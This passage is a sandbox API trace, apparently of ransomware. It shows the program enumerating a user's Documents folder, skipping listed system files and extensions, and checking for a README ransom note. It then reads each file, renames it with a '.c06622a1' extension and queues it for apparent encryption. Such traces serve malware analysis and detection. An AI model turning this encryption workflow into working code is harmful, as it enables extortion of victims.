dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.116] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.116] CloseHandle (hObject=0x1c) returned 1 [0149.117] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal")) returned 0x10 [0149.117] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\") returned="" [0149.117] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\") returned 0x32 [0149.117] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0149.117] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd8ec990, ftCreationTime.dwHighDateTime=0x1d5dffb, ftLastAccessTime.dwLowDateTime=0xd77e1d20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd77e1d20, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.118] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67957110, ftCreationTime.dwHighDateTime=0x1d5e1cd, ftLastAccessTime.dwLowDateTime=0x7c507e0, ftLastAccessTime.dwHighDateTime=0x1d5dad5, ftLastWriteTime.dwLowDateTime=0x7c507e0, ftLastWriteTime.dwHighDateTime=0x1d5dad5, nFileSizeHigh=0x0, nFileSizeLow=0x17d3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="AVFCiAJsAJ.doc", cAlternateFileName="AVFCIA~1.DOC")) returned 1 [0149.118] _wcsicmp (_Str1="AVFCiAJsAJ.doc", _Str2="README.c06622a1.TXT") returned -17 [0149.118] wcsstr (_Str="AVFCiAJsAJ.doc", _SubStr="README") returned 0x0 [0149.118] _wcsicmp (_Str1="autorun.inf", _Str2="AVFCiAJsAJ.doc") returned -1 [0149.118] wcslen (_String="autorun.inf") returned 0xb [0149.118] _wcsicmp (_Str1="boot.ini", _Str2="AVFCiAJsAJ.doc") returned 1 [0149.118] wcslen (_String="boot.ini") returned 0x8 [0149.118] _wcsicmp (_Str1="bootfont.bin", _Str2="AVFCiAJsAJ.doc") returned 1 [0149.118] wcslen (_String="bootfont.bin") returned 0xc [0149.118] _wcsicmp (_Str1="bootsect.bak", _Str2="AVFCiAJsAJ.doc") returned 1 [0149.118] wcslen (_String="bootsect.bak") returned 0xc [0149.118] _wcsicmp (_Str1="desktop.ini", _Str2="AVFCiAJsAJ.doc") returned 3 [0149.118] wcslen (_String="desktop.ini") returned 0xb [0149.118] _wcsicmp (_Str1="iconcache.db", _Str2="AVFCiAJsAJ.doc") returned 8 [0149.118] wcslen (_String="iconcache.db") returned 0xc [0149.118] _wcsicmp (_Str1="ntldr", _Str2="AVFCiAJsAJ.doc") returned 13 [0149.118] wcslen (_String="ntldr") returned 0x5 [0149.118] _wcsicmp (_Str1="ntuser.dat", _Str2="AVFCiAJsAJ.doc") returned 13 [0149.118] wcslen (_String="ntuser.dat") returned 0xa [0149.118] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AVFCiAJsAJ.doc") returned 13 [0149.118] wcslen (_String="ntuser.dat.log") returned 0xe [0149.118] _wcsicmp (_Str1="ntuser.ini", _Str2="AVFCiAJsAJ.doc") returned 13 [0149.119] wcslen (_String="ntuser.ini") returned 0xa [0149.119] _wcsicmp (_Str1="thumbs.db", _Str2="AVFCiAJsAJ.doc") returned 19 [0149.119] wcslen (_String="thumbs.db") returned 0x9 [0149.119] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0149.119] wcslen (_String="386") returned 0x3 [0149.119] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0149.119] wcslen (_String="adv") returned 0x3 [0149.119] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0149.119] wcslen (_String="ani") returned 0x3 [0149.119] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0149.119] wcslen (_String="bat") returned 0x3 [0149.119] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0149.119] wcslen (_String="bin") returned 0x3 [0149.119] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0149.119] wcslen (_String="cab") returned 0x3 [0149.123] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0149.123] wcslen (_String="cmd") returned 0x3 [0149.123] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0149.123] wcslen (_String="com") returned 0x3 [0149.123] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0149.123] wcslen (_String="cpl") returned 0x3 [0149.123] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0149.123] wcslen (_String="cur") returned 0x3 [0149.123] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0149.123] wcslen (_String="deskthemepack") returned 0xd [0149.123] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0149.123] wcslen (_String="diagcab") returned 0x7 [0149.123] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0149.123] wcslen (_String="diagcfg") returned 0x7 [0149.123] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0149.123] wcslen (_String="diagpkg") returned 0x7 [0149.124] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0149.124] wcslen (_String="dll") returned 0x3 [0149.124] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0149.124] wcslen (_String="drv") returned 0x3 [0149.124] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0149.124] wcslen (_String="exe") returned 0x3 [0149.124] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0149.124] wcslen (_String="hlp") returned 0x3 [0149.124] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0149.124] wcslen (_String="icl") returned 0x3 [0149.124] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0149.124] wcslen (_String="icns") returned 0x4 [0149.124] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0149.124] wcslen (_String="ico") returned 0x3 [0149.124] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0149.124] wcslen (_String="ics") returned 0x3 [0149.124] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0149.124] wcslen (_String="idx") returned 0x3 [0149.124] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0149.124] wcslen (_String="ldf") returned 0x3 [0149.124] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0149.124] wcslen (_String="lnk") returned 0x3 [0149.124] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0149.124] wcslen (_String="mod") returned 0x3 [0149.124] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0149.124] wcslen (_String="mpa") returned 0x3 [0149.124] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0149.124] wcslen (_String="msc") returned 0x3 [0149.124] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0149.124] wcslen (_String="msp") returned 0x3 [0149.124] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0149.124] wcslen (_String="msstyles") returned 0x8 [0149.124] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0149.124] wcslen (_String="msu") returned 0x3 [0149.124] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0149.124] wcslen (_String="nls") returned 0x3 [0149.125] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0149.125] wcslen (_String="nomedia") returned 0x7 [0149.125] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0149.125] wcslen (_String="ocx") returned 0x3 [0149.125] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0149.125] wcslen (_String="prf") returned 0x3 [0149.125] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0149.125] wcslen (_String="ps1") returned 0x3 [0149.125] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0149.125] wcslen (_String="rom") returned 0x3 [0149.125] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0149.125] wcslen (_String="rtp") returned 0x3 [0149.125] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0149.125] wcslen (_String="scr") returned 0x3 [0149.125] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0149.125] wcslen (_String="shs") returned 0x3 [0149.125] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0149.125] wcslen (_String="spl") returned 0x3 [0149.125] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0149.125] wcslen (_String="sys") returned 0x3 [0149.125] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0149.125] wcslen (_String="theme") returned 0x5 [0149.125] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0149.125] wcslen (_String="themepack") returned 0x9 [0149.125] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0149.125] wcslen (_String="wpx") returned 0x3 [0149.125] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0149.125] wcslen (_String="lock") returned 0x4 [0149.125] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0149.125] wcslen (_String="key") returned 0x3 [0149.125] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0149.125] wcslen (_String="hta") returned 0x3 [0149.125] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0149.125] wcslen (_String="msi") returned 0x3 [0149.125] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0149.125] wcslen (_String="pdb") returned 0x3 [0149.125] _wcsicmp (_Str1="sql", _Str2="doc") returned 15 [0149.126] wcslen (_String="sql") returned 0x3 [0149.126] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0149.126] wcslen (_String="sqlite") returned 0x6 [0149.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal")) returned 0x10 [0149.126] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.126] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" [0149.126] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned 0x31 [0149.126] wcscpy (in: _Dest=0x45000f4, _Source="AVFCiAJsAJ.doc" | out: _Dest="AVFCiAJsAJ.doc") returned="AVFCiAJsAJ.doc" [0149.126] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc", dwFileAttributes=0x80) returned 1 [0149.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\avfciajsaj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0149.126] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.126] ReadFile (in: hFile=0x630, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0149.127] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xb65c839a [0149.127] RtlComputeCrc32 (PartialCrc=0x839a, Buffer=0x3fe8f4, Length=0x80) returned 0x5e04603 [0149.127] RtlComputeCrc32 (PartialCrc=0x4603, Buffer=0x3fe8f4, Length=0x80) returned 0x494906f5 [0149.127] RtlComputeCrc32 (PartialCrc=0x6f5, Buffer=0x3fe8f4, Length=0x80) returned 0x1941c719 [0149.127] RtlComputeCrc32 (PartialCrc=0xc719, Buffer=0x3fe8f4, Length=0x80) returned 0xd708c341 [0149.127] CloseHandle (hObject=0x630) returned 1 [0149.127] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.127] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc" [0149.127] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc") returned 0x40 [0149.127] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.127] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\avfciajsaj.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\avfciajsaj.doc.c06622a1"), dwFlags=0x8) returned 1 [0149.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\AVFCiAJsAJ.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\avfciajsaj.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0149.131] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.131] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a124372 [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7eca9aa5 [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x763d9197 [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27606d82 [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76ee94fe [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b651c1e [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x48f4755a [0149.137] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1864325b [0149.140] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x4cc238f9 [0149.140] RtlComputeCrc32 (PartialCrc=0x38f9, Buffer=0x2f30094, Length=0x80) returned 0x58d6cc3c [0149.140] RtlComputeCrc32 (PartialCrc=0xcc3c, Buffer=0x2f30094, Length=0x80) returned 0x7236ed69 [0149.140] RtlComputeCrc32 (PartialCrc=0xed69, Buffer=0x2f30094, Length=0x80) returned 0xfd10102c [0149.140] RtlComputeCrc32 (PartialCrc=0x102c, Buffer=0x2f30094, Length=0x80) returned 0x954ff46a [0149.140] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0149.140] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.140] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.140] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcacf0040, ftCreationTime.dwHighDateTime=0x1d5dc6c, ftLastAccessTime.dwLowDateTime=0xff941dc0, ftLastAccessTime.dwHighDateTime=0x1d5e0e4, ftLastWriteTime.dwLowDateTime=0xff941dc0, ftLastWriteTime.dwHighDateTime=0x1d5e0e4, nFileSizeHigh=0x0, nFileSizeLow=0x74d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DtR t6N.csv", cAlternateFileName="DTRT6N~1.CSV")) returned 1 [0149.140] _wcsicmp (_Str1="DtR t6N.csv", _Str2="README.c06622a1.TXT") returned -14 [0149.140] wcsstr (_Str="DtR t6N.csv", _SubStr="README") returned 0x0 [0149.140] _wcsicmp (_Str1="autorun.inf", _Str2="DtR t6N.csv") returned -3 [0149.140] wcslen (_String="autorun.inf") returned 0xb [0149.140] _wcsicmp (_Str1="boot.ini", _Str2="DtR t6N.csv") returned -2 [0149.140] wcslen (_String="boot.ini") returned 0x8 [0149.140] _wcsicmp (_Str1="bootfont.bin", _Str2="DtR t6N.csv") returned -2 [0149.140] wcslen (_String="bootfont.bin") returned 0xc [0149.141] _wcsicmp (_Str1="bootsect.bak", _Str2="DtR t6N.csv") returned -2 [0149.141] wcslen (_String="bootsect.bak") returned 0xc [0149.141] _wcsicmp (_Str1="desktop.ini", _Str2="DtR t6N.csv") returned -15 [0149.141] wcslen (_String="desktop.ini") returned 0xb [0149.141] _wcsicmp (_Str1="iconcache.db", _Str2="DtR t6N.csv") returned 5 [0149.141] wcslen (_String="iconcache.db") returned 0xc [0149.141] _wcsicmp (_Str1="ntldr", _Str2="DtR t6N.csv") returned 10 [0149.141] wcslen (_String="ntldr") returned 0x5 [0149.141] _wcsicmp (_Str1="ntuser.dat", _Str2="DtR t6N.csv") returned 10 [0149.141] wcslen (_String="ntuser.dat") returned 0xa [0149.141] _wcsicmp (_Str1="ntuser.dat.log", _Str2="DtR t6N.csv") returned 10 [0149.141] wcslen (_String="ntuser.dat.log") returned 0xe [0149.141] _wcsicmp (_Str1="ntuser.ini", _Str2="DtR t6N.csv") returned 10 [0149.141] wcslen (_String="ntuser.ini") returned 0xa [0149.141] _wcsicmp (_Str1="thumbs.db", _Str2="DtR t6N.csv") returned 16 [0149.141] wcslen (_String="thumbs.db") returned 0x9 [0149.141] _wcsicmp (_Str1="386", _Str2="csv") returned -48 [0149.141] wcslen (_String="386") returned 0x3 [0149.141] _wcsicmp (_Str1="adv", _Str2="csv") returned -2 [0149.141] wcslen (_String="adv") returned 0x3 [0149.141] _wcsicmp (_Str1="ani", _Str2="csv") returned -2 [0149.141] wcslen (_String="ani") returned 0x3 [0149.141] _wcsicmp (_Str1="bat", _Str2="csv") returned -1 [0149.141] wcslen (_String="bat") returned 0x3 [0149.141] _wcsicmp (_Str1="bin", _Str2="csv") returned -1 [0149.141] wcslen (_String="bin") returned 0x3 [0149.141] _wcsicmp (_Str1="cab", _Str2="csv") returned -18 [0149.141] wcslen (_String="cab") returned 0x3 [0149.141] _wcsicmp (_Str1="cmd", _Str2="csv") returned -6 [0149.141] wcslen (_String="cmd") returned 0x3 [0149.141] _wcsicmp (_Str1="com", _Str2="csv") returned -4 [0149.141] wcslen (_String="com") returned 0x3 [0149.141] _wcsicmp (_Str1="cpl", _Str2="csv") returned -3 [0149.141] wcslen (_String="cpl") returned 0x3 [0149.141] _wcsicmp (_Str1="cur", _Str2="csv") returned 2 [0149.141] wcslen (_String="cur") returned 0x3 [0149.141] _wcsicmp (_Str1="deskthemepack", _Str2="csv") returned 1 [0149.142] wcslen (_String="deskthemepack") returned 0xd [0149.142] _wcsicmp (_Str1="diagcab", _Str2="csv") returned 1 [0149.142] wcslen (_String="diagcab") returned 0x7 [0149.142] _wcsicmp (_Str1="diagcfg", _Str2="csv") returned 1 [0149.142] wcslen (_String="diagcfg") returned 0x7 [0149.142] _wcsicmp (_Str1="diagpkg", _Str2="csv") returned 1 [0149.142] wcslen (_String="diagpkg") returned 0x7 [0149.142] _wcsicmp (_Str1="dll", _Str2="csv") returned 1 [0149.142] wcslen (_String="dll") returned 0x3 [0149.142] _wcsicmp (_Str1="drv", _Str2="csv") returned 1 [0149.142] wcslen (_String="drv") returned 0x3 [0149.142] _wcsicmp (_Str1="exe", _Str2="csv") returned 2 [0149.142] wcslen (_String="exe") returned 0x3 [0149.142] _wcsicmp (_Str1="hlp", _Str2="csv") returned 5 [0149.142] wcslen (_String="hlp") returned 0x3 [0149.142] _wcsicmp (_Str1="icl", _Str2="csv") returned 6 [0149.142] wcslen (_String="icl") returned 0x3 [0149.142] _wcsicmp (_Str1="icns", _Str2="csv") returned 6 [0149.142] wcslen (_String="icns") returned 0x4 [0149.142] _wcsicmp (_Str1="ico", _Str2="csv") returned 6 [0149.142] wcslen (_String="ico") returned 0x3 [0149.142] _wcsicmp (_Str1="ics", _Str2="csv") returned 6 [0149.142] wcslen (_String="ics") returned 0x3 [0149.142] _wcsicmp (_Str1="idx", _Str2="csv") returned 6 [0149.142] wcslen (_String="idx") returned 0x3 [0149.142] _wcsicmp (_Str1="ldf", _Str2="csv") returned 9 [0149.142] wcslen (_String="ldf") returned 0x3 [0149.142] _wcsicmp (_Str1="lnk", _Str2="csv") returned 9 [0149.142] wcslen (_String="lnk") returned 0x3 [0149.142] _wcsicmp (_Str1="mod", _Str2="csv") returned 10 [0149.142] wcslen (_String="mod") returned 0x3 [0149.142] _wcsicmp (_Str1="mpa", _Str2="csv") returned 10 [0149.142] wcslen (_String="mpa") returned 0x3 [0149.142] _wcsicmp (_Str1="msc", _Str2="csv") returned 10 [0149.142] wcslen (_String="msc") returned 0x3 [0149.142] _wcsicmp (_Str1="msp", _Str2="csv") returned 10 [0149.142] wcslen (_String="msp") returned 0x3 [0149.142] _wcsicmp (_Str1="msstyles", _Str2="csv") returned 10 [0149.143] wcslen (_String="msstyles") returned 0x8 [0149.143] _wcsicmp (_Str1="msu", _Str2="csv") returned 10 [0149.143] wcslen (_String="msu") returned 0x3 [0149.143] _wcsicmp (_Str1="nls", _Str2="csv") returned 11 [0149.143] wcslen (_String="nls") returned 0x3 [0149.143] _wcsicmp (_Str1="nomedia", _Str2="csv") returned 11 [0149.143] wcslen (_String="nomedia") returned 0x7 [0149.143] _wcsicmp (_Str1="ocx", _Str2="csv") returned 12 [0149.143] wcslen (_String="ocx") returned 0x3 [0149.143] _wcsicmp (_Str1="prf", _Str2="csv") returned 13 [0149.143] wcslen (_String="prf") returned 0x3 [0149.143] _wcsicmp (_Str1="ps1", _Str2="csv") returned 13 [0149.143] wcslen (_String="ps1") returned 0x3 [0149.143] _wcsicmp (_Str1="rom", _Str2="csv") returned 15 [0149.143] wcslen (_String="rom") returned 0x3 [0149.143] _wcsicmp (_Str1="rtp", _Str2="csv") returned 15 [0149.143] wcslen (_String="rtp") returned 0x3 [0149.143] _wcsicmp (_Str1="scr", _Str2="csv") returned 16 [0149.143] wcslen (_String="scr") returned 0x3 [0149.143] _wcsicmp (_Str1="shs", _Str2="csv") returned 16 [0149.143] wcslen (_String="shs") returned 0x3 [0149.143] _wcsicmp (_Str1="spl", _Str2="csv") returned 16 [0149.143] wcslen (_String="spl") returned 0x3 [0149.143] _wcsicmp (_Str1="sys", _Str2="csv") returned 16 [0149.143] wcslen (_String="sys") returned 0x3 [0149.143] _wcsicmp (_Str1="theme", _Str2="csv") returned 17 [0149.143] wcslen (_String="theme") returned 0x5 [0149.143] _wcsicmp (_Str1="themepack", _Str2="csv") returned 17 [0149.143] wcslen (_String="themepack") returned 0x9 [0149.143] _wcsicmp (_Str1="wpx", _Str2="csv") returned 20 [0149.143] wcslen (_String="wpx") returned 0x3 [0149.143] _wcsicmp (_Str1="lock", _Str2="csv") returned 9 [0149.143] wcslen (_String="lock") returned 0x4 [0149.143] _wcsicmp (_Str1="key", _Str2="csv") returned 8 [0149.143] wcslen (_String="key") returned 0x3 [0149.143] _wcsicmp (_Str1="hta", _Str2="csv") returned 5 [0149.143] wcslen (_String="hta") returned 0x3 [0149.143] _wcsicmp (_Str1="msi", _Str2="csv") returned 10 [0149.144] wcslen (_String="msi") returned 0x3 [0149.144] _wcsicmp (_Str1="pdb", _Str2="csv") returned 13 [0149.144] wcslen (_String="pdb") returned 0x3 [0149.144] _wcsicmp (_Str1="sql", _Str2="csv") returned 16 [0149.144] wcslen (_String="sql") returned 0x3 [0149.144] _wcsicmp (_Str1="sqlite", _Str2="csv") returned 16 [0149.144] wcslen (_String="sqlite") returned 0x6 [0149.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal")) returned 0x10 [0149.144] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.144] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" [0149.144] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned 0x31 [0149.144] wcscpy (in: _Dest=0x45000f4, _Source="DtR t6N.csv" | out: _Dest="DtR t6N.csv") returned="DtR t6N.csv" [0149.144] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv", dwFileAttributes=0x80) returned 1 [0149.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\dtr t6n.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0149.144] SetFilePointerEx (in: hFile=0x634, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.144] ReadFile (in: hFile=0x634, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0149.145] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x2d33aa48 [0149.145] RtlComputeCrc32 (PartialCrc=0xaa48, Buffer=0x3fe8f4, Length=0x80) returned 0x57f705a8 [0149.145] RtlComputeCrc32 (PartialCrc=0x5a8, Buffer=0x3fe8f4, Length=0x80) returned 0x6dac8774 [0149.145] RtlComputeCrc32 (PartialCrc=0x8774, Buffer=0x3fe8f4, Length=0x80) returned 0xb131284f [0149.145] RtlComputeCrc32 (PartialCrc=0x284f, Buffer=0x3fe8f4, Length=0x80) returned 0x84e89faf [0149.145] CloseHandle (hObject=0x634) returned 1 [0149.145] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.145] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\DtR t6N.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS 